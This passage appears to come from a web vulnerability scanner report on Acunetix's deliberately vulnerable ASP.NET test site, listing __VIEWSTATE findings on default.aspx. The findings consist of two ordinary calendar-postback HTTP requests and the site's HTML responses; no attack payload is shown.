visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1113 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,113 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8468&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBAmebnGdsIHgJTRBYBBgBA5zkxINsIZGRkauDThufc0PrKo6bJw%2F7af9qRhrw%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLvrOGZDALRp67yDgLQp%2BbjBwLcy%2BvqAgLcy%2BvqAgLcy9%2FTDwLcy9%2FTDwLcy%2FP2CALcy%2FP2CAKx0t2fCgKx0t2fCgKx0vGyAwKx0vGyAwKx0uXJDAKx0uXJDAKx0pnsBQKx0pnsBQKx0o2DDQKx0o2DDQKx0qGmBgKx0qGmBgKx0tX6DwKx0tX6DwKx0smRBwKx0smRBwKx0r35BQKx0r35BQKx0tGdDQKx0tGdDQKK%2BaMFAor5owUCivnX2QkCivnX2QkCivnL%2FAICivnL%2FAICivn%2FkwoCivn%2FkwoCivmTtgMCivmTtgMCivmHzQwCivmHzQwCivm74AUCivm74AUCivmvhw0Civmvhw0CivmD7AsCivmD7AsCivm3gwMCivm3gwMCv5PjxAkCv5PjxAkCv5OXmwECv5OXmwECv5OLvgoCv5OLvgoCv5O%2F1QMCv5O%2F1QMCv5PT6QwCv5PT6QwCv5PHjAQCv5PHjAQCv5P7ow0Cv5P7ow0Cv5PvxgYCv5PvxgYCv5PDrwMCv5PDrwMCv5P3wgwCv5P3wgwCkLrB6w8CkLrB6w8CkLr1jgcCkLr1jgcCkLrpJQKQuuklApC6nfgJApC6nfgJApC6sZ8BApC6sZ8BApC6pbIKApC6pbIKApC62dYDApC62dYDApC6ze0MApC6ze0MApC6odUJApC6odUJ2F1%2BpUPb7DU43m%2BGgIMdKnDOLfI%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:16:17 GMT Content-Length: 12504
Response Body - size: 12,504 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBAmebnGdsIHgJTRBYBBgBA5zkxINsIZGRkauDThufc0PrKo6bJw/7af9qRhrw=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLvrOGZDALRp67yDgLQp+bjBwLcy+vqAgLcy+vqAgLcy9/TDwLcy9/TDwLcy/P2CALcy/P2CAKx0t2fCgKx0t2fCgKx0vGyAwKx0vGyAwKx0uXJDAKx0uXJDAKx0pnsBQKx0pnsBQKx0o2DDQKx0o2DDQKx0qGmBgKx0qGmBgKx0tX6DwKx0tX6DwKx0smRBwKx0smRBwKx0r35BQKx0r35BQKx0tGdDQKx0tGdDQKK+aMFAor5owUCivnX2QkCivnX2QkCivnL/AICivnL/AICivn/kwoCivn/kwoCivmTtgMCivmTtgMCivmHzQwCivmHzQwCivm74AUCivm74AUCivmvhw0Civmvhw0CivmD7AsCivmD7AsCivm3gwMCivm3gwMCv5PjxAkCv5PjxAkCv5OXmwECv5OXmwECv5OLvgoCv5OLvgoCv5O/1QMCv5O/1QMCv5PT6QwCv5PT6QwCv5PHjAQCv5PHjAQCv5P7ow0Cv5P7ow0Cv5PvxgYCv5PvxgYCv5PDrwMCv5PDrwMCv5P3wgwCv5P3wgwCkLrB6w8CkLrB6w8CkLr1jgcCkLr1jgcCkLrpJQKQuuklApC6nfgJApC6nfgJApC6sZ8BApC6sZ8BApC6pbIKApC6pbIKApC62dYDApC62dYDApC6ze0MApC6ze0MApC6odUJApC6odUJ2F1+pUPb7DU43m+GgIMdKnDOLfI=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8432')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">March 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8491')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8457')" style="color:Black" title="February 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8458')" style="color:Black" title="February 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8459')" style="color:Black" title="February 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8460')" style="color:Black" title="March 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8461')" style="color:Black" title="March 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8462')" style="color:Black" title="March 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8463')" style="color:Black" title="March 04">4</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8464')" style="color:Black" title="March 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8465')" style="color:Black" title="March 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8466')" style="color:Black" title="March 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8467')" style="color:Black" title="March 08">8</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8468')" style="color:White" title="March 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8469')" style="color:Black" title="March 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8470')" style="color:Black" title="March 11">11</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8471')" style="color:Black" title="March 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8472')" style="color:Black" title="March 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8473')" style="color:Black" title="March 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8474')" style="color:Black" title="March 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8475')" style="color:Black" title="March 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8476')" style="color:Black" title="March 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8477')" style="color:Black" title="March 18">18</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8478')" style="color:Black" title="March 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8479')" style="color:Black" title="March 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8480')" style="color:Black" title="March 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8481')" style="color:Black" title="March 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8482')" style="color:Black" title="March 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8483')" style="color:Black" title="March 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8484')" style="color:Black" title="March 25">25</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8485')" style="color:Black" title="March 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8486')" style="color:Black" title="March 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8487')" style="color:Black" title="March 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8488')" style="color:Black" title="March 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8489')" style="color:Black" title="March 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8490')" style="color:Black" title="March 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8491')" style="color:Black" title="April 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8492')" style="color:Black" title="April 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8493')" style="color:Black" title="April 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8494')" style="color:Black" title="April 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8495')" style="color:Black" title="April 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8496')" style="color:Black" title="April 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8497')" style="color:Black" title="April 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8498')" style="color:Black" title="April 08">8</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1111 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,111 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8472&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBAmebnGdsIHgJTRBYBBgBAjuNVI9sIZGRkkjD8pptN4VQPqbCjCKL48Tg6pWk%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLi7M3yCQLRp67yDgLQp%2BbjBwLcy%2BvqAgLcy%2BvqAgLcy9%2FTDwLcy9%2FTDwLcy%2FP2CALcy%2FP2CAKx0t2fCgKx0t2fCgKx0vGyAwKx0vGyAwKx0uXJDAKx0uXJDAKx0pnsBQKx0pnsBQKx0o2DDQKx0o2DDQKx0qGmBgKx0qGmBgKx0tX6DwKx0tX6DwKx0smRBwKx0smRBwKx0r35BQKx0r35BQKx0tGdDQKx0tGdDQKK%2BaMFAor5owUCivnX2QkCivnX2QkCivnL%2FAICivnL%2FAICivn%2FkwoCivn%2FkwoCivmTtgMCivmTtgMCivmHzQwCivmHzQwCivm74AUCivm74AUCivmvhw0Civmvhw0CivmD7AsCivmD7AsCivm3gwMCivm3gwMCv5PjxAkCv5PjxAkCv5OXmwECv5OXmwECv5OLvgoCv5OLvgoCv5O%2F1QMCv5O%2F1QMCv5PT6QwCv5PT6QwCv5PHjAQCv5PHjAQCv5P7ow0Cv5P7ow0Cv5PvxgYCv5PvxgYCv5PDrwMCv5PDrwMCv5P3wgwCv5P3wgwCkLrB6w8CkLrB6w8CkLr1jgcCkLr1jgcCkLrpJQKQuuklApC6nfgJApC6nfgJApC6sZ8BApC6sZ8BApC6pbIKApC6pbIKApC62dYDApC62dYDApC6ze0MApC6ze0MApC6odUJApC6odUJtek%2BwBGsGjIC%2FLTVK9jZ5OYkOck%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:27:58 GMT Content-Length: 12504
Response Body - size: 12,504 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBAmebnGdsIHgJTRBYBBgBAjuNVI9sIZGRkkjD8pptN4VQPqbCjCKL48Tg6pWk=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLi7M3yCQLRp67yDgLQp+bjBwLcy+vqAgLcy+vqAgLcy9/TDwLcy9/TDwLcy/P2CALcy/P2CAKx0t2fCgKx0t2fCgKx0vGyAwKx0vGyAwKx0uXJDAKx0uXJDAKx0pnsBQKx0pnsBQKx0o2DDQKx0o2DDQKx0qGmBgKx0qGmBgKx0tX6DwKx0tX6DwKx0smRBwKx0smRBwKx0r35BQKx0r35BQKx0tGdDQKx0tGdDQKK+aMFAor5owUCivnX2QkCivnX2QkCivnL/AICivnL/AICivn/kwoCivn/kwoCivmTtgMCivmTtgMCivmHzQwCivmHzQwCivm74AUCivm74AUCivmvhw0Civmvhw0CivmD7AsCivmD7AsCivm3gwMCivm3gwMCv5PjxAkCv5PjxAkCv5OXmwECv5OXmwECv5OLvgoCv5OLvgoCv5O/1QMCv5O/1QMCv5PT6QwCv5PT6QwCv5PHjAQCv5PHjAQCv5P7ow0Cv5P7ow0Cv5PvxgYCv5PvxgYCv5PDrwMCv5PDrwMCv5P3wgwCv5P3wgwCkLrB6w8CkLrB6w8CkLr1jgcCkLr1jgcCkLrpJQKQuuklApC6nfgJApC6nfgJApC6sZ8BApC6sZ8BApC6pbIKApC6pbIKApC62dYDApC62dYDApC6ze0MApC6ze0MApC6odUJApC6odUJtek+wBGsGjIC/LTVK9jZ5OYkOck=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8432')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">March 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8491')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8457')" style="color:Black" title="February 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8458')" style="color:Black" title="February 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8459')" style="color:Black" title="February 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8460')" style="color:Black" title="March 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8461')" style="color:Black" title="March 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8462')" style="color:Black" title="March 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8463')" style="color:Black" title="March 04">4</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8464')" style="color:Black" title="March 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8465')" style="color:Black" title="March 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8466')" style="color:Black" title="March 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8467')" style="color:Black" title="March 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8468')" style="color:Black" title="March 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8469')" style="color:Black" title="March 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8470')" style="color:Black" title="March 11">11</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8471')" style="color:Black" title="March 12">12</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8472')" style="color:White" title="March 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8473')" style="color:Black" title="March 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8474')" style="color:Black" title="March 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8475')" style="color:Black" title="March 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8476')" style="color:Black" title="March 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8477')" style="color:Black" title="March 18">18</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8478')" style="color:Black" title="March 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8479')" style="color:Black" title="March 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8480')" style="color:Black" title="March 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8481')" style="color:Black" title="March 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8482')" style="color:Black" title="March 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8483')" style="color:Black" title="March 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8484')" style="color:Black" title="March 25">25</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8485')" style="color:Black" title="March 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8486')" style="color:Black" title="March 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8487')" style="color:Black" title="March 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8488')" style="color:Black" title="March 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8489')" style="color:Black" title="March 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8490')" style="color:Black" title="March 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8491')" style="color:Black" title="April 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8492')" style="color:Black" title="April 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8493')" style="color:Black" title="April 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8494')" style="color:Black" title="April 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8495')" style="color:Black" title="April 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8496')" style="color:Black" title="April 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8497')" style="color:Black" title="April 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8498')" style="color:Black" title="April 08">8</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
